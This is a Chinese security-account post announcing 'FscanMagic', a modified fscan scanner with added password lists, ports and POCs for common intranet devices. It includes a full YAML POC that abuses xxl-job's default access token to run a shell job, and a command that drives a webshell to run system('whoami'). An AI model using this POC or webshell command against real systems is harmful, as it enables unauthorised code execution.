申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
添加常见密码
添加常见端口
输出信息添加不同颜色
增加常见的POC
新增加了一些常见的POC(内网中经常遇到),如:海康威视、大华、华三、华为、xxl_job、宏景......
poc模版与xray的相似
name: poc-yaml-xxl_job_accessTokenrules:- method: POSTpath: "/run"headers:Content-Type: application/jsonXXL-JOB-ACCESS-TOKEN: default_tokenbody: |-{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}expression: |response.status == 200 && response.body.bcontains(bytes('{"code":200}'))
webshell管理
./fscan -WHost "url" -Wcommand "system('whoami');" -WebShellPasswd "密码"添加了两个参数
-WHost:webshell的url,如:http://127.0.0.1/webshell.php
-WebShellPasswd:webshell的密码,如:123456
脚本已放置星球
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
原文始发于微信公众号(鹏组安全):FscanMagic
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论